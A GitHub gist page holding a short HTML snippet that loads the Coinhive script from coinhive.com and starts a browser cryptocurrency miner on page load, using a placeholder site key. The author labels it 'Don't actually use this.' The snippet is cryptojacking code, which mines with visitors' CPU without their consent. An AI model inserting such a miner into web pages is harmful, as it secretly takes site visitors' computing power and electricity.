Skip to content

Instantly share code, notes, and snippets.

@a11ce
Created January 23, 2018 14:24
Show Gist options
  • Save a11ce/703c2d4667a46c4788b24eeb43ac8c11 to your computer and use it in GitHub Desktop.
Save a11ce/703c2d4667a46c4788b24eeb43ac8c11 to your computer and use it in GitHub Desktop.
Launches coinhive miner at full power on page load. Don't actually use this.
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('<YOUR-PUBLIC-SITE-KEY-GOES-HERE');
miner.start();
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment